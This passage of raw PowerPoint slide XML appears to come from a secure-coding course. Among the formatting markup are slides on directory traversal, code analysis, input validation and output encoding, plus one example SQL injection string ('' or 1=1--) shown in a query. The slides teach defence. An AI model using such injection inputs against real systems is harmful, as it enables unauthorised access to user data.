                <a:solidFill>
                  <a:srgbClr val="45545F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="857250" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ED1C24"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="45545F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1200150" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="1350"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1543050" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="1350"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1885950" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1350"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2228850" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1350"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2571750" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1350"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="2914650" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1350"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC8CBF4D-12CC-4217-BC78-60E1E83ED991}"/>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id="{46F41246-45C3-4CDE-8B82-A02820F5EA7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2982D17-B9C2-4088-A614-149525AD109A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5240952" y="1430176"/>
            <a:ext cx="3676249" cy="633459"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3676249"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 633459"/>
              <a:gd name="connsiteX1" fmla="*/ 525178 w 3676249"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 633459"/>
              <a:gd name="connsiteX2" fmla="*/ 1050357 w 3676249"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 633459"/>
              <a:gd name="connsiteX3" fmla="*/ 1465248 w 3676249"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 633459"/>
              <a:gd name="connsiteX4" fmla="*/ 2063951 w 3676249"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 633459"/>
              <a:gd name="connsiteX5" fmla="*/ 2515605 w 3676249"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 633459"/>
              <a:gd name="connsiteX6" fmla="*/ 3077546 w 3676249"/>
              <a:gd name="connsiteY6" fmla="*/ 0 h 633459"/>
              <a:gd name="connsiteX7" fmla="*/ 3676249 w 3676249"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 633459"/>
              <a:gd name="connsiteX8" fmla="*/ 3676249 w 3676249"/>
              <a:gd name="connsiteY8" fmla="*/ 329399 h 633459"/>
              <a:gd name="connsiteX9" fmla="*/ 3676249 w 3676249"/>
              <a:gd name="connsiteY9" fmla="*/ 633459 h 633459"/>
              <a:gd name="connsiteX10" fmla="*/ 3077546 w 3676249"/>
              <a:gd name="connsiteY10" fmla="*/ 633459 h 633459"/>
              <a:gd name="connsiteX11" fmla="*/ 2478842 w 3676249"/>
              <a:gd name="connsiteY11" fmla="*/ 633459 h 633459"/>
              <a:gd name="connsiteX12" fmla="*/ 2027189 w 3676249"/>
              <a:gd name="connsiteY12" fmla="*/ 633459 h 633459"/>
              <a:gd name="connsiteX13" fmla="*/ 1612298 w 3676249"/>
              <a:gd name="connsiteY13" fmla="*/ 633459 h 633459"/>
              <a:gd name="connsiteX14" fmla="*/ 1197407 w 3676249"/>
              <a:gd name="connsiteY14" fmla="*/ 633459 h 633459"/>
              <a:gd name="connsiteX15" fmla="*/ 745753 w 3676249"/>
              <a:gd name="connsiteY15" fmla="*/ 633459 h 633459"/>
              <a:gd name="connsiteX16" fmla="*/ 0 w 3676249"/>
              <a:gd name="connsiteY16" fmla="*/ 633459 h 633459"/>
              <a:gd name="connsiteX17" fmla="*/ 0 w 3676249"/>
              <a:gd name="connsiteY17" fmla="*/ 316730 h 633459"/>
              <a:gd name="connsiteX18" fmla="*/ 0 w 3676249"/>
              <a:gd name="connsiteY18" fmla="*/ 0 h 63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76249" h="633459" fill="none" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="226694" y="-6077"/>
                  <a:pt x="313622" y="40511"/>
                  <a:pt x="525178" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="736734" y="-40511"/>
                  <a:pt x="918428" y="2676"/>
                  <a:pt x="1050357" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1182286" y="-2676"/>
                  <a:pt x="1324631" y="46240"/>
                  <a:pt x="1465248" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1605865" y="-46240"/>
                  <a:pt x="1846687" y="49711"/>
                  <a:pt x="2063951" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2281215" y="-49711"/>
                  <a:pt x="2362557" y="42541"/>
                  <a:pt x="2515605" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2668653" y="-42541"/>
                  <a:pt x="2843712" y="4120"/>
                  <a:pt x="3077546" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3311380" y="-4120"/>
                  <a:pt x="3431738" y="55026"/>
                  <a:pt x="3676249" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3697714" y="109930"/>
                  <a:pt x="3663174" y="173907"/>
                  <a:pt x="3676249" y="329399"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3689324" y="484891"/>
                  <a:pt x="3671842" y="558299"/>
                  <a:pt x="3676249" y="633459"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3397640" y="646788"/>
                  <a:pt x="3254799" y="623458"/>
                  <a:pt x="3077546" y="633459"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2900293" y="643460"/>
                  <a:pt x="2759736" y="592852"/>
                  <a:pt x="2478842" y="633459"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2197948" y="674066"/>
                  <a:pt x="2202264" y="624259"/>
                  <a:pt x="2027189" y="633459"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1852114" y="642659"/>
                  <a:pt x="1737338" y="596360"/>
                  <a:pt x="1612298" y="633459"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1487258" y="670558"/>
                  <a:pt x="1295683" y="588340"/>
                  <a:pt x="1197407" y="633459"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1099131" y="678578"/>
                  <a:pt x="887378" y="596021"/>
                  <a:pt x="745753" y="633459"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="604128" y="670897"/>
                  <a:pt x="248466" y="582200"/>
                  <a:pt x="0" y="633459"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-7535" y="543222"/>
                  <a:pt x="10793" y="428569"/>
                  <a:pt x="0" y="316730"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-10793" y="204891"/>
                  <a:pt x="33934" y="132209"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
              <a:path w="3676249" h="633459" stroke="0" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="131279" y="-16981"/>
                  <a:pt x="223231" y="28125"/>
                  <a:pt x="414891" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="606551" y="-28125"/>
                  <a:pt x="710920" y="45952"/>
                  <a:pt x="829782" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="948644" y="-45952"/>
                  <a:pt x="1156164" y="36265"/>
                  <a:pt x="1281435" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1406706" y="-36265"/>
                  <a:pt x="1602787" y="27083"/>
                  <a:pt x="1769851" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1936915" y="-27083"/>
                  <a:pt x="2053599" y="35574"/>
                  <a:pt x="2184742" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2315885" y="-35574"/>
                  <a:pt x="2411054" y="18600"/>
                  <a:pt x="2599633" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2788212" y="-18600"/>
                  <a:pt x="2827443" y="3771"/>
                  <a:pt x="3014524" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3201605" y="-3771"/>
                  <a:pt x="3379264" y="1101"/>
                  <a:pt x="3676249" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3680013" y="151610"/>
                  <a:pt x="3653724" y="177067"/>
                  <a:pt x="3676249" y="310395"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3698774" y="443724"/>
                  <a:pt x="3638079" y="546798"/>
                  <a:pt x="3676249" y="633459"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3550701" y="661568"/>
                  <a:pt x="3305629" y="582064"/>
                  <a:pt x="3077546" y="633459"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2849463" y="684854"/>
                  <a:pt x="2756278" y="615360"/>
                  <a:pt x="2515605" y="633459"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2274932" y="651558"/>
                  <a:pt x="2166196" y="593514"/>
                  <a:pt x="2027189" y="633459"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1888182" y="673404"/>
                  <a:pt x="1698882" y="579445"/>
                  <a:pt x="1575535" y="633459"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1452188" y="687473"/>
                  <a:pt x="1205454" y="597818"/>
                  <a:pt x="1087119" y="633459"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="968784" y="669100"/>
                  <a:pt x="730854" y="592750"/>
                  <a:pt x="598703" y="633459"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="466552" y="674168"/>
                  <a:pt x="273993" y="570070"/>
                  <a:pt x="0" y="633459"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-31135" y="529103"/>
                  <a:pt x="3994" y="471701"/>
                  <a:pt x="0" y="316730"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-3994" y="161759"/>
                  <a:pt x="6329" y="147379"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:extLst>
              <a:ext uri="{C807C97D-BFC1-408E-A445-0C87EB9F89A2}">
                <ask:lineSketchStyleProps xmlns:ask="http://schemas.microsoft.com/office/drawing/2018/sketchyshapes" sd="1617156465">
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <ask:type>
                    <ask:lineSketchScribble/>
                  </ask:type>
                </ask:lineSketchStyleProps>
              </a:ext>
            </a:extLst>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="257175" indent="-257175" algn="l" defTabSz="342900" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="-342900" algn="l" defTabSz="342900" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ED1C24"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>tbl_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> WHERE username = '' or 1=1--#</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2049278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GB" noProof="0" dirty="0"/>
              <a:t>Directory Traversal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Directory traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Obtain access to files outside web site root directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The threat actor submits a request for a file outside the web server's root directory by submitting a path to navigate to the parent directory (../). This attack can succeed if the input is not filtered properly and access permissions on the file are the same as those on the web server directory.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1539EB9C-8093-415D-9F46-59A4B093D6C9}"/>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id="{FA5039DA-1EA4-4A35-84EE-9A9F97E7F674}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="290923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7A213-333C-4217-9327-F019CE2B3F57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Summarize Secure Coding Practices </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72749C15-026C-4CE3-A2AD-4653298CD50A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Topic 14C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C571CD1-C73E-48B3-A7FC-2B06095E6728}"/>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id="{48AEEEAE-D68F-497C-95B2-CCBE5BFB3F5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2988139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Code Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Static/source code analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Submit code for analysis by automated software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Manual code review</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Human analysis of source code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some of the most important coding practices are input validation, output encoding, and error handling.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Normalization means that a string is stripped of illegal characters or substrings and converted to the accepted character set. Output encoding means that the string is re-encoded safely for the context in which it is being used. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3215B57A-5AD3-4BA6-95ED-F136A7001742}"/>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id="{C4B5008C-76DA-4408-BCDF-3B6372FDEF87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="405985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Code Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6" descr="A screenshot of a social media post&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EC3AEBD-6B21-4A6A-B7CD-12FEDCFEED20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="202698" y="708660"/>
            <a:ext cx="4444791" cy="3979081"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF945CEE-46DB-4153-9B93-4864761B93A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5158596" y="968991"/>
            <a:ext cx="3638898" cy="3376241"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run application in a staging environment for testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>"stress testing"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E61B4781-801B-4C79-A933-5E67A75FB441}"/>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id="{B0EA7182-EEB8-4E64-824F-B3C11AE05FA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{895CEBB1-52B9-4381-B87B-B114C4E17433}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114841" y="4692066"/>
            <a:ext cx="2502608" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
